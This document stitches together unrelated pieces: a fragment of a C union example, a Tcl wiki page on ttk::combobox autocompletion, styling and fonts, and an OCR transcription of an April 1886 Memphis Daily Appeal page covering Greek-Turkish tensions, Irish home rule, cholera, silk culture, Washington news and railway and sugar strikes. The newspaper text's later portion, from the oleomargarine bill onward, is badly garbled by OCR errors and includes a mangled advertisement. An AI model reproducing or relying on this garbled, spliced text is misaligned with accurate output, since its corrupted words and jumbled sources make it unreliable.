Florus B. Plimpton, who has been on the edito rial staff of the.'omtToiaI (iasf'.lt since 1800, died to-night of a complication of diseases. He was fifty hve years old. Beverlv. Mass . April 22. Kdward T. Shaw, who for twelve years has carried the mail between the local poslottice and the railway station, was arrested to-d-y. He confessed to hav ing systematically robbed the mails for feve al years, taking between 30(10 and WltlO letters and obtaining upward of iloOt). Cleveland, O., April .".'.-The city ministers, headed by Bishop Bedell of the Kpis opal Church, are preparing to boycott the Sunday secular news-iiaiw-rs. Confidential circulars have been issued to clergymen and all have In-en urged to join the movement and denounce Sunday apeiKl'rom their ptilits May 2d New York, April 22. -There was a spirited contest for the position of Deputy Command) r of the Depart ment of New York at the afternoon session of the Grand Army of the Re public, resulting finally in'the election of .1 I Sayles of Rome. For Senior Vice-Commander, Charles A. Orr of Buffalo was chosen. C: nrlcston, 111., April 22.-- Follow- ing the arrest last night ot I-.mma Fleetwood, charged wiih complicity in the murder; of her mother and father hmt April the announcement is made that the two sons of the mur dered couple, one of w hom is in Kan sas and the other in Washington Ter ritory, will be brought back if jwssi hle " When arrested, Emma did not exhibit any surprise, merely saying she was ini-cit Aid for tbe HU Loala Strike. St. Louis, April 2?. The Executive Board of the Knights of Labor re ceived to-day, up to noon, for tbe strikers' fund $3100 in drafts, and telegram from the East stating that $20,000 had been forwarded from sym pathizers in that part of the country. A Verdict or Not UniHjr. St. Louis, Ad-il 22 The i arv before whom tbe case of VV. W. 
Withers, charged with placing dynamite on the track of a street railway during the strike of some months ago, causing se vere d.-msge to tbe company a prop erty, returt.ed a verdict tday of not guilty. Another Strike n tbe Nonthrra Pa cini-. Houston, Tex., April 22. The yard- men of the S iuthern Pacific railroad struck to-day, for what cause is not stated. The strikers number abont fifty men. Freight traffic on the lines has been suspended since the trouble -begau. Strike at Hum Clljr. Kansas City. Mo . April 22. Sixty men employed m truckers, stowmen, receiver and checkers at tbe Missouri Pacific freight depot struck to-night, demanding more pay. Tbe etrikeia claim that it is a movement in their aid. They eay it will seriously inter fere with busineis hern unless new men are secured to fill the vacant placss. KiKht-nnr THS OFFICIALS OF TUB COMPANY had repeated deferences with indi vidual member and with the commit tee of the stiikerj, bnt no arrange ment was arrived at. On t ie outskirts were many women in carr.as's who waved their handkerchiefs when the ergines bacxed lnfo toe stall again. The committer ol the strikers keut at work at the switchmen who had been imported by tbe cumpany. They argued with tbm, they b'tgged them to show themselves men and get out of tbeenr. They told them: "Thecsstle yon are in pow; will tumble down ard the ra:In a I tnngnates will be bnried with yon in the ruics." "Have you gt a f-mily? So have we. Here s S 1 r vnu to come out. and here's $10 more," and tbe bills were put, np be'o-e 1I10 window. "If you don't conic wi'h us you can go to tue uttermost pa t of the earth and the odium will f illow you." TBE ATTKMPT TO STAKT TRAINS ABAN DONED. Up ti 4 o'clock the railroad officials were endeavoring unsuccessfully to get man to run an engine on tbe main track, and the strikers were laboring with tbe switchmen to try and make them give up. 
At 5 0 clock bitten ot the new men bad pined the sinters, and the sunpoutton then was that they would to a man join the strikers. Six of the strikers were a -rested on the warrants sworn out by the company. At 6 p.m. the Sherifl ordered the deputies to return to the city until 0 o clock lo-iiiorrow morning, the r ill road company having decided to make no further attempt to run trains until that time It s. ems impossible to in duce engineers to take their engines out against the w slies of the strikers. A reporter who talked to several of the engineers claims that they are afraid to do so, and k is said the rail-1 road officials are uncertain what move to make next. Everything is quiet at present STRIKERS INPKIt AHKGsT. A deputy-sheriff arrived in the city tlrs evening having in charge five strikers who had ben placed under arrest by the Sheriff's posse. They were arrested on State warrants sworn out before a justice of the peace, charging "conspiracy to maliciously and feloniously prevent the free and safe passage of trains of freight cars." The prisoners were taken to the Har rison street police station and locked up. Business at the custom-house was very dull to-day on account of the strike. Some of the employes were of the opinion that there were nearly fifty loaded cars due in Chicago nowout on tbe Lake Shore somewhere between Chicago and Elkhart. The cars are very valuable, and contain goods for about all the importers in Chicago. THROUGH B1SJNKS8WAS VKBV PCLL at the custom-house. Many of the iiianeetors wen1 kept verv bllSV lit the stock-vards looking for shipments of meat for export from the packing and canning houses. The inspectors say that somo of the exporters seem to feel that there is going to be a general strike on the railroads centering here, and a rtsulting shut down of manu facturing establishments. 
The export ers are hurrying off what stock they have 111 order to meet foreign con tracts and not be caught if the strike affects any other Eastern roads. A still larger' force of inspectors and as sistants will be sent to the stock ys'.rds to-morrow in answer to the de mands of exporters. EXTENT OF THK 8TBIXB. It is s.iid this evening that the etiike has rrmutWtions thst are not fill y un deretojd by any bnt the mn them selves, and it is n": Rt a'l improbable tht ail the switchmen in the country, a l.nr tlinHM rn-iween here and lhe se-itioard, t-tand resv to aid ti e Lake Shr men hv striking whenever crll.-d on to do "so. U has been t er sifetently deuied that this strike w undwr i'om direction of the Switch men's Mutual id Association, and this hipv beret fne have bien t ue. But inform .1. ion was gained to-dsy tba. the Aid Association won'd be only ti tilalof sn oppor tunity to. take up the eic'e cf the Btnk- TbeJiew York Street-far Strike. New Yobk, April 22 A represent ative of the Executive Committee ttates that the board has determined that the strike shall be confined to the Third Avenue road nnhss in caw of a combination of all the roads anainst tbe strikers. The other reals are warned bv the strikes to keep away from Third avenue. During the strike the men wib be paid from tbe funds of the association as though they were at work. Thequettoa of a general tie no will be hr d in abeyance. A drunhen man tried to raise a dis turbance with a conductor about noon to-dav onaTHrd avenuecar. Acrowd grathered and tioka hand. The police used tr eir duos to q'leu tna low ana butt ed the druukenfelloff to the lU- tion-houee. Another eld rutin, an old driver, was arrested and locked up for assaulting drivers and conductors in the employ oi the road. The Brand inrv spent the day in considering tns cases t f the Third Avenue strikers, who were arretted for riotire on Tusedav. and those who have beon earning on the bakers' and other boycotts. 
It is understood thst a number of indictments were found, and that on Monday investigation will be made into the methods em ployed by the Executive Board of the Empire rrotective Association in or dering a general tie-up ol the city street-car lines. It is thought indictments can be found under the law sgainet conspiracy to intimidate A bovcott has been declared against 1 charitable institution, which furnishes work to a number of crippled dots in the manufacture 01 brushes. loeDoy- rntt in declared by tte Brush Makers1 Union, hecanae the wotk comes into competition with that of members of that union. The immediate result of the boycott has been to secure a large number of orders tor toe cnppiea work. Trie cars stopped mooing and the stables were c oied at t :3U o cioce io nieht in order that the pcle might gain more rest.. Twenty officers were left on fill ird at the depot. During tho day fifty-eight cars were running, To-morrow the superin tendent inleudt lo run seventy-five cars on the Thiid avenue road, and will begin running ears on the One Hundred ami 1 -nrv fi'th street line, and pts ilily some ca ble c.irs. All the ncvrly-hired men are lodged end ftd by the company in the depot building, where ihnre are accommodations for nearly 1000 men, one of the directors cf tbe road eaii this evening. There will be no meeting ot tbe directois until the rpgnlar monthly meeting. They have made up their minds as to their coarse of action, and will not chnngn it. To-night the pickets of the strikers aro on duty a'l along Third uvenue. The strikers had a large meeting to n ght, and afterward the representa tive of the Executive Board detailed the system of organisation for enf ore ing tbestrike. Heeaid: "All of otir men are with ns. Not ore has gotie back since the strike began. AU of our men who have asked have re ceived their full daily psy. Twenty of the company's new men have left to-day anil most of them have joined the organiration. More will came out in the morning. 
Over twenty horses have died in the stables fir want of proper care since the strike began, end s number of them have been in the yard since Saturday. Seventeen . dead horses were lying tham tn Hnv. The company has no hone-shoere, aid have Doen seuaing oat hows witbmit shoes, en 1 th s has called for Mr. Berth's interference. The citiaens of New York need fiar no violence from our men. X; :n bnt our pickets will bs allowed ou Third av enue nmil t.11 trouble is sjttltKi. Pick e'swillbe on dutv day and night lrom tbe Citv Halt to Harlem tridge, snd w:ll report ti hesdqnsrters every hour. Aboat 2r0 pickets are on duty at one time, under command of a most reliable man, with fif eea ae sistantp, and thev are relieved every five hurs. The picket who finds one cf our men on the avenue will t.iks him in charge and pus him on frem onH to another nmil he reaches tho hall." Ail w.is quiet at midnight. Will I angorate the Btjateiav Chicago. III.. April 11. One of the largest meetings of furniture manu facturer s ever held in toe uniteu 8la.es was in session here to-day. Delegates were present from Illinois, Michigi'n. Wisions'n, Minnesota, Iowa, Indiana rnd Kentucky. Over 160 firms were represented, it was de cided to inaugurate the eight-hour system, commencing May 15th, snd at the same time make an advance of 10 per cent, on the prices of ell kinds oi furniture. AN EXTRAORDINARY AHREST. The Officer la ttlHpnte Over a Pris oner. San Antonio, Tex , Aprii;22. A. N. Towr.s, whose extiardinary arrest on Tuesday almost at the same moment by two c 111 cars known to each other, ou charges of having committed two murders many years ego, was laxen 10 Hill county, Tex , where be will be tried for killing Thomas Woods six years ago.. Sheriff B?U and Detective Hughes had much d fficnlty in decid ing which should take the prisoner. The detective grabbed Towcs first. He bed an extradition warrant from Oov. 
Ireland permitting him to take the prisoner to Mississip pi, but the Texae sheriff threatened to ask the Governor to withdraw the warrant, and thu secured the pris oner. Towns declares that he can e'ear bin-self in both caees, as he acted in salf defeDS?. The prisoner took a decided interest in the dispute be tween the officeis for his possession. Ue suggested that tbey toss a copper, and there is a strong sospUion that the matter was actually settled in that way to avoid a quanet.' lhe Whlaky Meav ' Chicago, III , April 22. The West ern Export Aisiciation to-day con cluded its rr.eet nz here. Out of a total of ninety o-?e distiller', seventy one were present. The association by a unanimons vote expelled Edward Spellman, the proprietor of the Enter prife distillery at Pekin, III. The charges ag- insi bim were refusing to pay his afsef-smen-'P, making up more bushels of grain than he was entitled to, end violating the wii'tsn cgreeraetnt made with the association. It was also resolved to huetain no bueioess rela- tious with b stoufe or any house that purchased gools from him. It was deefded that, price? and overs should remain as fcteretofnre. Children Bo rand Dralb. West Newton, Pa , April 22. While Mrj. Albert Neff was planting vegetables in the garden th's morning the honse caught fire, and before she could rescie her four childrn, who were sleeping up stairf,Vhey were ter ribly burned. Two of the little ones are reported sinking rapidly and are expaeti d to die et any moment. on-ReiJent Notice. No. 6CHU, H. D.-In the Chanoery Court of : bhelby county, Tnn. Sutia ol Tennease . T8. Taylor Abernatby ; et al. it appearing from allegation of toe bill in thia oaua". which ia w.rn tu, that the de fendant. 
MraW F liardin and Willidine Hardin, K T Brorbaa, Harriet Bell, uean W Cheek, William K Flowera, Jane J .Lam beraon, Uavid McKay, Milet M Kobinaon, Win J Robinaon, haaan w Robinunn, S D Roaaeli ani wife, Ophelia Roaaell, WinDeld btnkea, Helen Srhmeilor, John Story, mra f arh T.ahe and Miss Harah Tigbe. plaoea of reiidenoe are unknown to eomplairiant and cannot be ascertained upon diligent inquiry made, and that the Metropolitan National Kunknf vewVork ie a aon-reaidcat ot tbe State ot Tennea-ee: It ia therefore orddred, That taey make tl oir appearance horem, t the Ccurt-llouaa of Shelby county, m Meuipbia, lenn., on or before the first Monday in June, A.D-, 1. end plead, anowor or demur to miuplin ant'a bill, or the Mine will be tabeu tor con t'eisoi aa to Ihoin o4 aet for hearing el parte ; and that a rovy "f hi o: der be pub liah'd om-e a week for four au"oivc weeks in the Mempaia Arpeal- 'ihii al d ot April, lSSfi. A copv A ttot : S. I. M.'IMWELL. Clerk and Maiter. Ty II. F. 'A'a'sh, Deputy C. and M. -lohn Jor-mton. Sol lorcn.pl nt.- aat HI. I.onl Stove Monldera TrnnMea. St. L cis, Mo., April 22. The mem beis o! the loc:-l Htove Moulders' Union eoxe time ago t'emandej cf their empl.ivers sn aJvunce in waej of 15 per cent. Two of the foundries seceded to their demand, and the management ot the o'.bers succeeded in averting a strike of their employes, l.set night at a nipoiing c the union Soa-Keaident Notice. Ito. 61i7, R. D.-In tho Chancery fourt ot Sheloy Cor nty. Tenn.-iitnte of Tenrea- iee va. Mary A lirenetl. It aptwarieg froiu allogntioni of lhe h II in this caua. wii.rh i rn to, that he de fendants, 1 M DuUoFc.JohB . LuilH teuton. L . U H'.pm Tni,l. H J PtrlllPa are non-reai.li.nla ot the titate of Tennea'ee, and tbu the ilace ol resiui'uco ui i nor end wim. tlayaor, i unknowa aaa cannot te ace:Uined upon dil-gent laquirj It ia therefore ordered, Th-t they make their si pearunce l erein, st the leurt-lloufe of tihelby countv. in Memp.iia. 
P"r belortlthe Oral sion-jsy iu uue, " ai d i,l-d,anweTordimartroniplainnl J bill, or lhe ame will he laen for ennfesjed aa to Ihem and aet for he-mug ei Pr'e: tha. a copy of thie order be l ublisbed once a week for tour a: ecejaive weka m tbe p'ala Appeal. Thie 2l day of April, U. .; A s'1M rPOWELL, Clerk and Maater. ' Ty H. F. Walah, Uepury C. and M. John Jobtn, f -ro"io('l ut. xml | txt
http://chroniclingamerica.loc.gov/lccn/sn84024448/1886-04-23/ed-1/seq-4/ocr/
CC-MAIN-2016-40
refinedweb
7,845
71.34
Hi all, I am assuming Camel uses Xerces2-J to do XML validation. If I am on the right track so far, this might be an issue for some. At the end of that issue, it says that in Xerces 2.7.0 a new feature was defined. When this feature is set to true, all schema location hints will be used to locate the components for a given target namespace, so if there are multiple imports for the same namespace, Xerces will access all of the schema locations provided. So I am wondering how I can enable this feature when I am writing a route. My route is

Thanks,
Mohit

Edited by: mhanda on Aug 24, 2010 6:01 AM

You can always validate the message from Java code yourself if a Camel component doesn't do what you want. You may also be able to set Xerces features using Java system properties or something along those lines; check the Xerces documentation for that. AFAIR there are no Xerces-specific options available on the Camel validator component. But if you show how to enable this feature in Xerces, we could consider adding an option so you can easily set it from the Camel component.
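As the reply suggests, one option is to validate the payload from plain Java (for example in a Camel processor) instead of relying on the validator component. A minimal sketch using the JAXP validation API: the class name, the inline XSD, and the sample document are invented for illustration; the feature URI is Xerces' honour-all-schemaLocations switch, and whether setFeature accepts it depends on the parser bundled with your runtime, so the call is wrapped in a try/catch.

```java
import javax.xml.XMLConstants;
import javax.xml.transform.stream.StreamSource;
import javax.xml.validation.Schema;
import javax.xml.validation.SchemaFactory;
import javax.xml.validation.Validator;
import java.io.StringReader;

public class ManualValidation {
    public static void main(String[] args) throws Exception {
        // Tiny schema, inlined so the example is self-contained.
        String xsd =
            "<?xml version=\"1.0\"?>"
            + "<xs:schema xmlns:xs=\"http://www.w3.org/2001/XMLSchema\">"
            + "  <xs:element name=\"greeting\" type=\"xs:string\"/>"
            + "</xs:schema>";

        SchemaFactory factory =
            SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
        try {
            // Xerces feature that makes the parser honour *all* schema
            // location hints for a namespace (introduced in Xerces 2.7.0;
            // support depends on the parser your runtime bundles).
            factory.setFeature(
                "http://apache.org/xml/features/honour-all-schemaLocations",
                true);
        } catch (Exception e) {
            System.out.println("feature not supported here: " + e.getMessage());
        }

        Schema schema = factory.newSchema(new StreamSource(new StringReader(xsd)));
        Validator validator = schema.newValidator();
        // validate() throws a SAXException if the document is invalid.
        validator.validate(new StreamSource(new StringReader("<greeting>hi</greeting>")));
        System.out.println("valid");
    }
}
```

From a Camel route you would call code like this from a processor or bean, which sidesteps whatever feature set the validator component exposes.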
https://developer.jboss.org/thread/245660
When I run ./byfn.sh -m up I get this error:

Error: got unexpected status: FORBIDDEN -- Failed to reach implicit threshold of 1 sub-policies, required 1 remaining: permission denied

Did you try ./byfn.sh -m down as mentioned in the answer? That solved the problem for me!

I faced the same issue ("Failed to reach implicit threshold of 1 sub-policies, required 1 remaining: permission denied") while creating the channel. There are two possible resolutions:

1] The previous network's volumes were not purged or deleted. Run the command docker volume prune and delete all the data in the crypto-config and channel-artifacts folders, then follow the Hyperledger Fabric docs to either create the artifacts manually and start the network, or use byfn.sh. If that doesn't resolve the issue, follow the second approach.

2] The directory is not accessible (read/write permissions), so grant access with "sudo chmod 777 dir".
https://www.edureka.co/community/29779/hyperledger-unexpected-forbidden-implicit-threshold-policies?show=29780
/****************************************************************************
**
****************************************************************************/

#include "mediaplayer.h"

int main(int argc, char *argv[])
{
    Q_INIT_RESOURCE(mediaplayer);

    QApplication app(argc, argv);
    app.setApplicationName("Media Player");
    app.setOrganizationName("Qt");
    app.setQuitOnLastWindowClosed(true);

    bool hasSmallScreen =
#ifdef Q_OS_SYMBIAN
        /* On Symbian, we always want fullscreen. One reason is that it's not
         * possible to launch any demos from the fluidlauncher due to a
         * limitation in the emulator. */
        true
#else
        false
#endif
        ;

    QString fileString;
    const QStringList args(app.arguments());
    /* We have a minor problem here, we accept two arguments, both are
     * optional:
     * - A file name
     * - the option "-small-screen", so let's try to cope with that. */
    for (int i = 0; i < args.count(); ++i) {
        const QString &at = args.at(i);
        if (at == QLatin1String("-small-screen"))
            hasSmallScreen = true;
        else if (i > 0) // We don't want the app name.
            fileString = at;
    }

    MediaPlayer player(fileString, hasSmallScreen);

    if (hasSmallScreen)
        player.showMaximized();
    else
        player.show();

    return app.exec();
}
https://doc.qt.io/archives/qt-4.7/demos-qmediaplayer-main-cpp.html
QML state changes on double click

- bluestreak

Hi all, I am trying to build a touch screen of tabs which, when the central part of the screen is double-clicked, goes to a new state where two identical tab displays are shown instead of only one. However, this never seems to happen. Can anyone see something wrong with this implementation?

@
import QtQuick 1.1

Item {
    width: 1540
    height: 320

    MouseArea {
        id: mouseArea
        x: 0
        y: 58
        width: 1540
        height: 262
        anchors.rightMargin: 0
        anchors.bottomMargin: 0
        anchors.leftMargin: 0
        anchors.topMargin: 58
        anchors.fill: parent
    }

    Tabs {
        width: 1540
        height: 320
        id: tabs
    }

    Tabs {
        id: tabs1
        x: 0
        y: 0
        width: 770
        height: 320
    }

    states: [
        State {
            name: "State1"; when: mouseArea.doubleClicked
            PropertyChanges {
                target: tabs
                width: 770
                height: 320
            }
            PropertyChanges {
                target: tabs1
                x: 770
                y: 0
                width: 770
                height: 320
            }
        }
    ]
}
@

- bluestreak

For anyone interested, I was able to fix this by using onDoubleClicked within the MouseArea, and having that toggle a bool property. Using mouseArea.doubleClicked as above doesn't work.

Solution:

@
property bool twoScreens: false

MouseArea {
    id: mouseArea
    onDoubleClicked: twoScreens = !twoScreens
}

states: [
    State {
        name: "State1"; when: twoScreens
@

The reason is that "doubleClicked" is a signal, not a property. The "when" property of a State is of type Binding, which expects the result of the binding expression to be boolean.
https://forum.qt.io/topic/18113/qml-state-changes-on-double-click
Instance variable initializers - C# vs. VB.NET

I ran into an interesting issue today when changing some VB.NET code. I was surprised at the outcome, so I did a quick repro case in C# and didn't have a problem. Given this simple C# app, the results are pretty easy to predict:

using System;

namespace InheritIssue
{
    class Class1
    {
        [STAThread]
        static void Main(string[] args)
        {
            Foo f = new Foo();
        }
    }

    public class Base
    {
        private int _data;

        public Base()
        {
            Init();
        }

        protected virtual void Init()
        {
            _data = 1;
            Console.WriteLine("Data initialized to " + _data);
        }
    }

    public class Foo : Base
    {
        private Alpha a = new Alpha();

        public Foo() : base()
        {
            Console.WriteLine("hello");
        }

        protected override void Init()
        {
            base.Init();
            Console.WriteLine("Initial Age: " + a.Age);
        }
    }

    public class Alpha
    {
        private int _age = -1;

        public int Age
        {
            get { return _age; }
            set { _age = value; }
        }
    }
}

In case you don't feel like running the code, you'll get:

Data initialized to 1
Initial Age: -1
hello

Now the same code in VB.NET:

Option Strict On
Option Explicit On

Namespace InheritIssue
    Public Class Class1
        <STAThread()> _
        Shared Sub Main()
            Dim f As Foo = New Foo
        End Sub

        Public Class Base
            Private _data As Integer

            Public Sub New()
                Init()
            End Sub

            Protected Overridable Sub Init()
                _data = 1
                Console.WriteLine("Data initialized to " & _data)
            End Sub
        End Class

        Public Class Foo
            Inherits Base

            Private a As Alpha = New Alpha

            Public Sub New()
                MyBase.New()
                Console.WriteLine("hello")
            End Sub

            Protected Overrides Sub Init()
                MyBase.Init()
                Console.WriteLine("Initial Age: " & a.Age)
            End Sub
        End Class

        Public Class Alpha
            Private _age As Integer = -1

            Public Property Age() As Integer
                Get
                    Return _age
                End Get
                Set(ByVal Value As Integer)
                    _age = Value
                End Set
            End Property
        End Class
    End Class
End Namespace

This code gets to the Base class initializer and outputs "Data initialized to 1". It then throws a NullReferenceException trying to access the Age property of the "a" object.
The "a" variable has not been initialized and is still null (Nothing). I thought this was odd, so I checked out the IL for Foo's constructor in both the C# and VB.NET versions and saw something noticeably different. In C#, the ctor is:

.method public hidebysig specialname rtspecialname
        instance void .ctor() cil managed
{
    // Code size 28 (0x1c)
    .maxstack 2
    IL_0000: ldarg.0
    IL_0001: newobj   instance void InheritIssue.Alpha::.ctor()
    IL_0006: stfld    class InheritIssue.Alpha InheritIssue.Foo::a
    IL_000b: ldarg.0
    IL_000c: call     instance void InheritIssue.Base::.ctor()
    IL_0011: ldstr    "hello"
    IL_0016: call     void [mscorlib]System.Console::WriteLine(string)
    IL_001b: ret
} // end of method Foo::.ctor

In VB.NET, there's an ever-so-slight difference:

.method public specialname rtspecialname
        instance void .ctor() cil managed
{
    // Code size 28 (0x1c)
    .maxstack 8
    IL_0000: ldarg.0
    IL_0001: call     instance void InheritIssue.Class1/Base::.ctor()
    IL_0006: ldarg.0
    IL_0007: newobj   instance void InheritIssue.Class1/Alpha::.ctor()
    IL_000c: stfld    class InheritIssue.Class1/Alpha InheritIssue.Class1/Foo::a
    IL_0011: ldstr    "hello"
    IL_0016: call     void [mscorlib]System.Console::WriteLine(string)
    IL_001b: ret
} // end of method Foo::.ctor

C# initialized the "a" variable to a new instance of Alpha before calling the base ctor. VB.NET did not do this. So when the Init method is called in Foo(), "a" is still null in the VB.NET version and you get a NullReferenceException. I checked the Visual Basic Language Specification for instance constructors and it states:

Emphasis added by me. Now checking the C# spec:

When an instance constructor has no constructor initializer, or it has a constructor initializer of the form base(...), that constructor implicitly performs the initializations specified by the variable-initializers of the instance fields declared in its class.
This corresponds to a sequence of assignments that are executed immediately upon entry to the constructor and before the implicit invocation of the direct base class constructor. The variable initializers are executed in the textual order in which they appear in the class declaration.

Whoa! Important difference there (very different!). I wonder why the language designers chose such a different path when deciding when to initialize instance variables?
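For what it's worth (this comparison isn't in the original post), Java happens to side with VB.NET here: instance field initializers run only after the superclass constructor returns, so a virtual method invoked from a base constructor sees uninitialized fields. A small sketch (class names are invented for the example):

```java
public class InitOrder {
    static String seen;

    static class Base {
        Base() {
            init();  // dispatches to the override, before Foo's fields exist
        }
        void init() { }
    }

    static class Foo extends Base {
        String a = "alpha";  // this initializer runs only after Base() returns

        @Override
        void init() {
            seen = "a = " + a;  // observes the field before initialization
        }
    }

    public static void main(String[] args) {
        new Foo();
        System.out.println(seen);  // prints: a = null
    }
}
```

The usual advice in both languages follows directly from this ordering: avoid calling overridable methods from constructors.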
https://weblogs.asp.net/psteele/438840
hi all, i know there is a code like childrenRecursive that gives back a list of all the children of an object (and the children of those children), but if i want to know the parent of a child, which code do i have to use? for example i have a cube and a sphere and the sphere is the child of the cube. if i write:

import bge

sc = bge.logic.getCurrentScene()
ob = sc.objects

cube = ob["Cube"]
sphere = ob["Sphere"]

child_list = cube.childrenRecursive

i will get a list of the children of the cube, but what if i want to know the parent of the sphere? i tried to find something on the web but nothing… thx for help

edit: hum maybe i posted in the wrong place, sorry
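In the BGE API every KX_GameObject also exposes a read-only parent attribute, so sphere.parent should give back the cube (and None for an object with no parent). A tiny stand-in class (plain Python, no bge, so it runs anywhere) to illustrate the relationship:

```python
class GameObject:
    """Minimal stand-in for the parent/children attributes of a
    bge KX_GameObject -- not the real API, just an illustration."""

    def __init__(self, name, parent=None):
        self.name = name
        self.parent = parent          # like KX_GameObject.parent
        self.children = []
        if parent is not None:
            parent.children.append(self)

cube = GameObject("Cube")
sphere = GameObject("Sphere", parent=cube)

print(sphere.parent.name)   # Cube
print(cube.parent)          # None (no parent at the root)
```

In an actual game-engine script the equivalent would simply be ob["Sphere"].parent.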
https://blenderartists.org/t/how-to-know-parent-object/594443
SYNOPSIS

```c
#include <sys/ddi.h>
#include <sys/sunddi.h>

int devmap_devmem_setup(devmap_cookie_t dhp, dev_info_t *dip,
    struct devmap_callback_ctl *callbackops, uint_t rnumber,
    offset_t roff, size_t len, uint_t maxprot, uint_t flags,
    ddi_device_acc_attr_t *accattrp);

int devmap_umem_setup(devmap_cookie_t dhp, dev_info_t *dip,
    struct devmap_callback_ctl *callbackops, ddi_umem_cookie_t cookie,
    offset_t koff, size_t len, uint_t maxprot, uint_t flags,
    ddi_device_acc_attr_t *accattrp);
```

INTERFACE LEVEL

Solaris DDI specific (Solaris DDI).

PARAMETERS

devmap_devmem_setup() parameters:

dhp — An opaque mapping handle that the system uses to describe the mapping.

dip — Pointer to the device's dev_info structure.

callbackops — Pointer to a devmap_callback_ctl(9S) structure. The structure contains pointers to device driver-supplied functions that manage events on the device mapping. The framework will copy the structure to system private memory.

rnumber — Index number to the register address space set.

roff — Offset into the register address space.

len — Length (in bytes) of the mapping to be mapped.

maxprot — Maximum protection flag possible for attempted mapping. Some combinations of possible settings are:

- PROT_READ — Read access is allowed.
- PROT_WRITE — Write access is allowed.
- PROT_EXEC — Execute access is allowed.
- PROT_USER — User-level access is allowed. The mapping is done as a result of a mmap(2) system call.
- PROT_ALL — All access is allowed.

flags — Used to determine the cache attribute. Possible values of the cache attribute are:

- IOMEM_DATA_CACHED — The CPU can cache the data it fetches and push it to memory at a later time. This is the default attribute that is used if no cache attributes are specified.
- IOMEM_DATA_UC_WR_COMBINE — The CPU never caches the data, but writes can occur out of order or can be combined. Reordering is implied. If IOMEM_DATA_UC_WR_COMBINE is specified but not supported, IOMEM_DATA_UNCACHED is used instead.
- IOMEM_DATA_UNCACHED — The CPU never caches data, but has uncacheable access to memory. Strict ordering is implied.

The cache attributes are mutually exclusive. Any combination of the values leads to a failure.
On the SPARC architecture, only IOMEM_DATA_CACHED is meaningful; the others lead to a failure.

devmap_umem_setup() parameters:

dhp — An opaque data structure that the system uses to describe the mapping.

dip — Pointer to the device's dev_info structure.

callbackops — Pointer to a devmap_callback_ctl(9S) structure. The structure contains pointers to device driver-supplied functions that manage events on the device mapping.

cookie — A kernel memory cookie (see ddi_umem_alloc(9F)).

koff — Offset into the kernel memory defined by cookie.

len — Length (in bytes) of the mapping to be mapped.

maxprot — Maximum protection flag possible for attempted mapping. Some combinations of possible settings are:

- PROT_READ — Read access is allowed.
- PROT_WRITE — Write access is allowed.
- PROT_EXEC — Execute access is allowed.
- PROT_USER — User-level access is allowed (the mapping is being done as a result of a mmap(2) system call).
- PROT_ALL — All access is allowed.

flags — Must be set to 0.

accattrp — Pointer to a ddi_device_acc_attr(9S) structure. Ignored in the current release. Reserved for future use.

DESCRIPTION

The devmap_devmem_setup() and devmap_umem_setup() functions are used in the devmap(9E) entry point to pass mapping parameters from the driver to the system.

The dhp argument specifies a device mapping handle that the system uses to store all mapping parameters of a physically contiguous memory. The system copies the data pointed to by callbackops to system private memory. This allows the driver to free the data after returning from either devmap_devmem_setup() or devmap_umem_setup(). The driver is notified of user events on the mappings via the entry points defined by devmap_callback_ctl(9S). The driver is notified of the following user events:

- User has called mmap(2) to create a mapping to the device memory.
- User has accessed an address in the mapping that has no translations.
- User has duplicated the mapping. Mappings are duplicated when the process calls fork(2).
- User has called munmap(2) on the mapping or is exiting (see exit(2)).
See devmap_map(9E), devmap_access(9E), devmap_dup(9E), and devmap_unmap(9E) for details on these entry points. By specifying a valid callbackops to the system, device drivers can manage events on a device mapping. For example, the devmap_access(9E) entry point allows drivers to perform context switching by unloading the mappings of other processes and loading the mapping of the calling process. Device drivers may specify NULL for callbackops, which means the drivers do not want to be notified by the system.

The maximum protection allowed for the mapping is specified in maxprot. accattrp defines the device access attributes; see ddi_device_acc_attr(9S) for more details.

devmap_devmem_setup() is used for device memory, to map in the register set given by rnumber at the offset into the register address space given by roff. The system uses rnumber and roff to go up the device tree to get the physical address that corresponds to roff. The range to be affected is defined by len and roff. The range from roff to roff + len must be physically contiguous memory and page aligned.

Drivers use devmap_umem_setup() for kernel memory, to map in the kernel memory described by cookie at the offset into the kernel memory space given by koff. cookie is a kernel memory pointer obtained from ddi_umem_alloc(9F). If cookie is NULL, devmap_umem_setup() returns -1. The range to be affected is defined by len and koff. The range from koff to koff + len must be within the limits of the kernel memory described by cookie and must be page aligned.

Drivers use devmap_umem_setup() to export the kernel memory allocated by ddi_umem_alloc(9F) to user space. The system selects a user virtual address that is aligned with the kernel virtual address being mapped, to avoid cache incoherence, if the mapping is not MAP_FIXED.

RETURN VALUES

0 — Successful completion.

-1 — An error occurred.

CONTEXT

devmap_devmem_setup() and devmap_umem_setup() can be called from user, kernel, and interrupt context.
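As an illustration (not taken from the original manual page), a devmap(9E) entry point that exports driver-allocated kernel memory with devmap_umem_setup() might be sketched as follows. The names xx_dip, xx_umem_cookie, xx_umem_size, and xx_acc_attr are hypothetical driver state assumed to be set up elsewhere (for example in attach(9E)); this only compiles against the Solaris DDI headers:

```c
#include <sys/ddi.h>
#include <sys/sunddi.h>

/* Hypothetical driver state, initialized elsewhere:
 *   xx_dip         - the driver's dev_info pointer
 *   xx_umem_cookie - cookie returned by ddi_umem_alloc(9F)
 *   xx_umem_size   - size passed to ddi_umem_alloc(9F)
 *   xx_acc_attr    - a ddi_device_acc_attr(9S) structure
 */
extern dev_info_t *xx_dip;
extern ddi_umem_cookie_t xx_umem_cookie;
extern size_t xx_umem_size;
extern ddi_device_acc_attr_t xx_acc_attr;

static int
xx_devmap(dev_t dev, devmap_cookie_t dhp, offset_t off, size_t len,
    size_t *maplen, uint_t model)
{
	size_t length = ptob(btopr(len));	/* round range up to pages */
	int error;

	/* Reject requests outside the allocated kernel memory. */
	if (off + length > xx_umem_size)
		return (ENXIO);

	/*
	 * NULL callbackops: this driver does not need event
	 * notifications.  flags must be 0 for devmap_umem_setup();
	 * accattrp is currently ignored but passed for completeness.
	 */
	error = devmap_umem_setup(dhp, xx_dip, NULL, xx_umem_cookie,
	    off, length, PROT_ALL, 0, &xx_acc_attr);
	if (error != 0)
		return (error);

	*maplen = length;
	return (0);
}
```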
SEE ALSO

exit(2), fork(2), mmap(2), munmap(2), devmap(9E), ddi_umem_alloc(9F), ddi_device_acc_attr(9S), devmap_callback_ctl(9S)

Writing Device Drivers for Oracle Solaris 11.2
http://docs.oracle.com/cd/E36784_01/html/E36886/devmap-devmem-setup-9f.html